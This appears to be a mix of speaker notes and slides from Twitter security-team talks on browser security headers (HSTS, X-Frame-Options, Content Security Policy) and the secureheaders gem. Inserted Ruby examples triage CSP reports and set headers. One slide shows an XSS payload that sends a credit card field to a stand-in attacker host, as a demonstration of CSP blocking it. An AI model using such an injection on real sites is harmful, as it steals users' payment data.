Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
Talk about HTTP Basic authorization
Many of these headers not only encourage best practices but also provide a better user experience and save resources
Take a survey
Save resources, since nothing is framed
Twitter has had clickjacking problems in the past. While X-Frame-Options (XFO) does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
HSTS preload and max-age
Explain how redirecting to HTTPS doesn't protect the initial request. Saves a round trip.
A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful XSS attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and by a variety of one-off methods.
strings or hashes
Yeah, some browsers protect you, but not all support it
Content security policy defines what can "run" on a page, and any deviation creates an alert. Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed content by leveraging the reports sent to us by the users' browsers. This complements the static and dynamic analysis provided by Brakeman and phantom-gang in a unique way, as we are receiving information from the user. We send the CSP reports to a central Scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to the Hadoop file system, which we can run "big data" reports against using Pig/Scalding. We send this information to SADB, where we can search and sort more easily.
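The report triage described above, as an added example that is not part of the talk or of Twitter's pipeline: a small Ruby script that parses CSP violation reports in the JSON shape browsers POST to a policy's report-uri and sorts them into the buckets a security team cares about (likely XSS, mixed content, browser-extension noise, everything else). The four reports, the example.com hosts and the category names are constructed for this example.

```ruby
require 'json'
require 'uri'

# Constructed sample reports (not real data), in the "csp-report" wrapper
# shape that browsers POST to the policy's report-uri.
SAMPLE_REPORTS = [
  <<~'JSON',
    {"csp-report": {"document-uri": "https://example.com/status/1",
     "effective-directive": "script-src", "violated-directive": "script-src 'self'",
     "blocked-uri": "inline", "status-code": 200}}
  JSON
  <<~'JSON',
    {"csp-report": {"document-uri": "https://example.com/status/2",
     "effective-directive": "img-src", "violated-directive": "img-src https:",
     "blocked-uri": "http://insecure.example.net/pixel.gif", "status-code": 200}}
  JSON
  <<~'JSON',
    {"csp-report": {"document-uri": "https://example.com/home",
     "effective-directive": "script-src", "violated-directive": "script-src 'self'",
     "blocked-uri": "chrome-extension", "source-file": "chrome-extension://abcdefgh/inject.js",
     "line-number": 12, "status-code": 200}}
  JSON
  <<~'JSON'
    {"csp-report": {"document-uri": "https://example.com/settings",
     "violated-directive": "font-src 'self'",
     "blocked-uri": "https://fonts.example.org/x.woff", "status-code": 200}}
  JSON
].freeze

EXTENSION_SCHEMES = %w[chrome-extension moz-extension safari-extension ms-browser-extension].freeze

Report = Struct.new(:document_uri, :directive, :blocked_uri, :source_file, keyword_init: true)

# Pull the fields we triage on out of one report body.
def parse_csp_report(json)
  body = JSON.parse(json).fetch('csp-report')
  # Older browsers send only violated-directive ("font-src 'self'"); its first
  # token is the directive name.
  directive = body['effective-directive'] || body['violated-directive'].to_s.split.first
  Report.new(document_uri: body['document-uri'].to_s,
             directive: directive.to_s,
             blocked_uri: body['blocked-uri'].to_s,
             source_file: body['source-file'])
end

# Browsers report extension-injected resources with the extension scheme,
# sometimes as the bare scheme name in blocked-uri.
def extension_origin?(value)
  v = value.to_s
  EXTENSION_SCHEMES.any? { |s| v == s || v.start_with?("#{s}:") }
end

def https_page?(document_uri)
  URI.parse(document_uri).scheme == 'https'
rescue URI::InvalidURIError
  false
end

# Order matters: extension noise is checked first so it never masquerades as
# XSS, and mixed content before the generic directive check because a plain
# http image on an https page is also an img-src violation.
def classify(report)
  return :browser_extension if extension_origin?(report.blocked_uri) || extension_origin?(report.source_file)
  return :mixed_content if https_page?(report.document_uri) && report.blocked_uri.start_with?('http://')
  if report.directive == 'script-src'
    return :possible_xss if %w[inline eval].include?(report.blocked_uri)
    return :unexpected_script
  end
  :other
end

# Count reports per category, the shape you would aggregate before searching.
def triage(raw_reports)
  raw_reports.each_with_object(Hash.new(0)) do |json, counts|
    counts[classify(parse_csp_report(json))] += 1
  end
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_REPORTS).each { |category, n| puts "#{category}: #{n}" }
end
```

In a real pipeline the extension bucket is the one to filter out first: it is by far the noisiest category and carries no signal about your own pages.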
2013: OC Rails Jan - SecureHeaders library and content security policy
Not your typical Rails security talk: Header use @ Twitter. @ocrails, January 30, 2013. @ocrails | @ndm
OK, but what are browser headers?
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
(These are request headers the browser sends; the rest of the talk is about the response headers the server sends back. The Basic value is only base64, not encryption: it decodes to Aladdin:open sesame.)
How hard is it to use?
Base case:
Strict-Transport-Security: max-age=10000000
Do all of your subdomains support SSL?
Strict-Transport-Security: max-age=10000000; includeSubDomains
(includeSubDomains makes the browser refuse plain HTTP for every subdomain for max-age seconds, so one HTTP-only subdomain becomes unreachable until the policy expires.)
Content secur-a-wat?
Content security policy is reshaping the security model.
It is a complicated spec with great differences across browsers.
It is not widely adopted.
However, in browsers that enforce it:
It completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It can protect users with infected browsers
It allows you to accept arbitrary HTML code from users
(video slide) @owaspoc Jan 2013 @ndm | @presidentbeef
But I have to...
OK, then I'll inject:
<script> var image = new Image(); image.src = "cyberhacker.com/steal?data=" + $('#credit_card').val();</script>
FALSE! img-src violation, no XHR allowed
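The headers from the HSTS and CSP slides, and the img-src check that defeats the injection above, as an added example that is not the secureheaders gem's code and not from the talk. It is a Rack-style middleware (the Rack interface is just call(env) returning [status, headers, body], so no gem is needed to run it) plus a deliberately small CSP source matcher; the policy, the example.com and cyberhacker.com hosts and the demo app are constructed for this example, and csp_allows? models only the 'self', scheme, origin and "*.host" source expressions, not the full spec.

```ruby
require 'uri'

# Rack-style middleware that adds the response headers discussed in the talk.
# Assumed policy and hosts below are illustrative, not Twitter's.
class SecurityHeaders
  DEFAULT_CSP = {
    'default-src' => ["'self'"],
    'script-src'  => ["'self'", 'https://cdn.example.com'],
    'img-src'     => ["'self'", 'https://*.img.example.com'],
    'report-uri'  => ['/csp_report']
  }.freeze

  def initialize(app, hsts_max_age: 10_000_000, include_subdomains: false, csp: DEFAULT_CSP)
    @app = app
    @hsts_max_age = hsts_max_age
    @include_subdomains = include_subdomains
    @csp = csp
  end

  def call(env)
    status, headers, body = @app.call(env)
    headers = headers.dup
    headers['X-Frame-Options'] = 'SAMEORIGIN'
    headers['Content-Security-Policy'] = self.class.csp_header(@csp)
    # RFC 6797: browsers ignore Strict-Transport-Security received over plain
    # HTTP, and the http->https redirect leaves that first request unprotected,
    # so the header is only worth emitting on HTTPS responses.
    headers['Strict-Transport-Security'] = hsts_header if https?(env)
    [status, headers, body]
  end

  def hsts_header
    value = "max-age=#{@hsts_max_age}"
    value += '; includeSubDomains' if @include_subdomains
    value
  end

  # "directive source source; directive source" serialisation of a policy hash.
  def self.csp_header(policy)
    policy.map { |directive, sources| "#{directive} #{sources.join(' ')}" }.join('; ')
  end

  private

  def https?(env)
    env['rack.url_scheme'] == 'https' || env['HTTP_X_FORWARDED_PROTO'] == 'https'
  end
end

# Run a trivial app through the middleware and return the response headers.
def demo_headers(scheme)
  app = ->(_env) { [200, { 'Content-Type' => 'text/html' }, ['<h1>hello</h1>']] }
  SecurityHeaders.new(app, include_subdomains: true).call('rack.url_scheme' => scheme)[1]
end

# Would the source list for +directive+ let a page at +page+ load +url+?
# Subset of the spec's matching: 'self', a scheme source such as "https:",
# an exact origin, and a "*.host" wildcard.
def csp_allows?(policy, directive, url, page)
  sources = policy.fetch(directive) { policy.fetch('default-src', []) }
  target = URI.parse(url)
  origin = URI.parse(page)
  sources.any? do |src|
    case src
    when "'self'"
      target.scheme == origin.scheme && target.host == origin.host && target.port == origin.port
    when /\A[a-z][a-z0-9+.-]*:\z/i # scheme source, e.g. "https:"
      "#{target.scheme}:" == src.downcase
    else
      next false if src.start_with?("'") # other keyword sources are not modelled here
      scheme, host = src.include?('://') ? src.split('://', 2) : [origin.scheme, src]
      next false unless target.scheme == scheme
      host = host.split('/').first.downcase # drop any path part
      if host.start_with?('*.')
        target.host.to_s.downcase.end_with?(host[1..-1])
      else
        target.host.to_s.downcase == host
      end
    end
  end
end
```

With this policy the slide's payload, written with an absolute URL, fails the img-src check because cyberhacker.com matches neither 'self' nor *.img.example.com, which is exactly the violation report the browser would send to /csp_report.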